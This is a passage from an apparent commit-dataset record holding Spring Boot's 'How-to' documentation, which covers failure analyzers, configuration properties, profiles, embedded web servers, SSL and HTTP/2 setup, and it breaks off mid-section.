gh-17968\n","repos":"philwebb\/spring-boot,chrylis\/spring-boot,rweisleder\/spring-boot,tiarebalbi\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,htynkn\/spring-boot,NetoDevel\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,spring-projects\/spring-boot,NetoDevel\/spring-boot,royclarkson\/spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,eddumelendez\/spring-boot,yangdd1205\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,vpavic\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,aahlenst\/spring-boot,vpavic\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,joshiste\/spring-boot,vpavic\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,mbenson\/spring-boot,eddumelendez\/spring-boot,ilayaperumalg\/spring-boot,spring-projects\/spring-boot,royclarkson\/spring-boot,dreis2211\/spring-boot,NetoDevel\/spring-boot,aahlenst\/spring-boot,NetoDevel\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,shakuzen\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,tiarebalbi\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot,shakuzen\/spring-boot,eddumelendez\/spring-boot,yangdd1205\/spring-boot,spring-projects\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,shakuzen\/spring-boot,htynkn\/spring-boot,yangdd1205\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,Buzzardo\/spring-boot,royclarkson\/spring-boot,mbenson\/spring-boot,rweisleder\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,chrylis\/spring-boot,rweisleder\/spring-boot,ilayaperumalg\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,rweisleder\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,wilkinsona\/spring-boot,scottfrederick\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' questions\nthat often arise when using Spring Boot. Its coverage is not exhaustive, but it\ndoes cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out\nhttps:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer. This is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe are also more than happy to extend this section. If you want to add a '`how-to`',\nsend us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\n\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\nin a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such an analyzer for application-context-related exceptions, JSR-303\nvalidations, and more. You can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present. If, for whatever reason, you cannot handle the exception, return `null`\nto give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer`\ncan simply implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but\nsometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You can see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` (see <<production-ready-features.adoc,the Actuator chapter>>),\nthere is also a `conditions` endpoint that renders the report in JSON. Use that endpoint\nto debug the application and see what features have been added (and which have not been\nadded) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. When\nreading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources. Pay special\nattention to the `+@Conditional*+` annotations to find out what features they enable and\nwhen. Add `--debug` to the command line or a System property `-Ddebug` to get a log on the\nconsole of all the auto-configuration decisions that were made in your app. In a running\nActuator app, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX\nequivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\nand read from there the available external configuration options. The\n`@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to\nexternal properties. Thus, `ServerProperties` has `prefix=\"server\"` and its configuration\nproperties are `server.port`, `server.address`, and others. In a running Actuator app,\nlook at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values\nexplicitly out of the `Environment` in a relaxed manner. It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\nresponse to SpEL expressions, normally evaluated with placeholders resolved from the\n`Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. There is more\nthan one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers`\nmethods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or\n`context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging\na jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some\neven before the context is created) and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n\"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>`\" in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed by using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, the following example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. The preceding example adds the `custom-resource` property\nsource at the end of the list so that a key defined in any of the usual other locations\ntakes precedence. A custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a\nconvenient and easy way to load a custom resource in the `Environment`, we do not\nrecommend it, because Spring Boot prepares the `Environment` before the\n`ApplicationContext` is refreshed. Any key defined with `@PropertySource` is loaded too\nlate to have any effect on auto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `ApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\"\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method but also bootstrap a Spring application to set up\nthe infrastructure to use, you can use the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class, depending on whether\nit thinks it needs a web application or not. The first thing you can do to help it is to\nleave server-related dependencies (e.g. servlet API) off the classpath. If you cannot do\nthat (for example, you run two applications from the same code base) then you can\nexplicitly call `setWebApplicationType(WebApplicationType.NONE)` on your\n`SpringApplication` instance or set the `applicationContextClass` property (through the\nJava API or with external properties). Application code that you want to run as your\nbusiness logic can be implemented as a `CommandLineRunner` and dropped into the context as\na `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\n\nThis section includes topics about setting and reading properties and configuration\nsettings and their interaction with Spring Boot applications.\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them by instead using the existing build\nconfiguration. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource\nfiltering. If you use the `spring-boot-starter-parent`, you can then refer to your\nMaven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is\napplied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add\n`src\/main\/resources` directly to the classpath (for hot reloading purposes). Doing so\ncircumvents the resource filtering and this feature. Instead, you can use the `exec:java`\ngoal or customize the plugin's configuration. See the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside\nthe `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring\nplaceholders (such as `$\\{placeholder}`) in your configuration. If that property is not\nset to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the\nfollowing example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion, escape\nthe Spring property placeholders as follows: `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of `SpringApplication`\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as\nyou create the application to modify its behavior. Alternatively, you can externalize the\nconfiguration by setting properties in `+spring.main.*+`. For example, in\n`application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application is not starting\nan embedded web server.\n\nProperties defined in external configuration override the values specified with the Java\nAPI, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses\nthree sources for the `ApplicationContext` (in the following order): `demo.MyApp`,\n`com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a\ndefined order (see \"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this ordering is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods and those added using `setSources()` are inspected to see if they have\n`@PropertySources`. If they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower priority than any added by using the default locations (such as\n`application.properties`), system properties, environment variables, or the command line.\n\nYou can also provide the following System properties (or environment variables) to change\nthe behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`): Defaults to `application` as the root of\nthe file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`): The file to load (such as a\nclasspath resource or a URL). A separate `Environment` property source is set up for this\ndocument and it can be overridden by system properties, environment variables, or the\ncommand line.\n\nNo matter what you set in the environment, Spring Boot always loads\n`application.properties` as described above. By default, if YAML is used, then files with\nthe '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. You can enable this behavior by using\nplaceholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (that is,\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled Maven filtering for the `application.properties`\ndirectly, you may want to also change the default filter token to use\nhttps:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other\ndelimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku\nor Cloud Foundry. In those two platforms, the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external\nproperties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis one level deep and has period-separated keys, as many people are used to with\n`Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`).\nAlso, you can launch your application with a `-D` argument (remember to put it before the\nmain class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting\nbut not by the `SpringApplicationBuilder.profiles()` method. Thus, the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in\nthe \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(a comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` method. If any of those profiles is active, that document\nis included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000. However, if the Spring profile called\n'`development`' is active, then the port is 9001. If '`production`' is active, then the\nport is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered. Later\nvalues override earlier values.\n\nTo do the same thing with properties files, you can use\n`application-$\\{profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and\nother places) into an application at runtime. There is not (and technically cannot be) an\nexhaustive list of all supported properties in a single location, because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations as well as the occasional use of\n`Binder`. For more about the exact ordering of loading properties, see\n\"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\n\nEach Spring Boot web application includes an embedded web server. This feature leads to a\nnumber of how-to questions, including how to change the embedded server and how to\nconfigure the embedded server. This section answers those questions.\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including\n`spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or\n`spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty\nby including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`,\n`spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies\nin addition to including the one you need. Spring Boot provides separate starters for\nHTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow\n2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring\nWebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\t\/\/ exclude Reactor Netty\n\t\tcompile.exclude module: 'spring-boot-starter-reactor-netty'\n\t}\n\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-webflux'\n\t\t\/\/ Use Undertow instead\n\t\tcompile 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so\nyou may need to keep a dependency on Netty even when you need to include a different HTTP\nserver.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will\nautomatically start it. To disable this behaviour configure the `WebApplicationType` in\nyour `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with\n`server.port` (for example, in `application.properties` or as a System property). Thanks\nto relaxed binding of `Environment` values, you can also use `SERVER_PORT` (for example,\nas an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`,\nuse `server.port=-1`. (Doing so is sometimes useful for testing.)\n\nFor more details, see\n\"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\"\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the\n`ServletWebServerApplicationContext` through its `WebServer`. The best way to get that and\nbe sure that it has been initialized is to add a `@Bean` of type\n`ApplicationListener<ServletWebServerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field by using the `@LocalServerPort` annotation, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Do not try\nto inject the port in a regular application. As we just saw, the value is set only after\nthe container has been initialized. Contrary to a test, application code callbacks are\nprocessed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nin `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. You can configure this behavior by setting the\n`server.compression.min-response-size` property.\n\nBy default, responses are compressed only if their content type is one of the\nfollowing:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the `server.compression.mime-types` property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. The following example shows\nsetting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/web\/server\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration such as the preceding example means the application no longer supports\na plain HTTP connector at port 8080. Spring Boot does not support the configuration of\nboth an HTTP connector and an HTTPS connector through `application.properties`. If you\nwant to have both, you need to configure one of them programmatically. We recommend using\n`application.properties` to configure HTTPS, as the HTTP connector is the easier of the\ntwo to configure programmatically. See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the\n`+server.http2.enabled+` configuration property. This support depends on the chosen web\nserver and the application environment, since that protocol is not supported\nout-of-the-box by JDK8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol. So you\nmust <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0+, HTTP\/2 is supported without any additional requirement on JDK8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the\nhttps:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies:\n`org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x which supports HTTP\/2 out of the box when\nusing JDK 9 or later. Alternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative`\nlibrary and its dependencies are installed on the host operating system.\n\nThe library folder must be made available, if not already, to the JVM library path. You\ncan do so with a JVM argument such as\n`-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`. More on this in the\nhttps:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation].\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-webflux-starter` is using by default Reactor Netty as a server.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports\nHTTP\/2 with native libraries. To enable that, your application needs to have an\nadditional dependency.\n\nSpring Boot manages the version for the\n`io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for\nall platforms. Developers can choose to import only the required dependencies using\na classifier (see https:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official\ndocumentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\n\nGenerally, you should first consider using one of the many available configuration keys\nand customize your web server by adding new entries in your `application.properties` (or\n`application.yml`, or environment, etc. 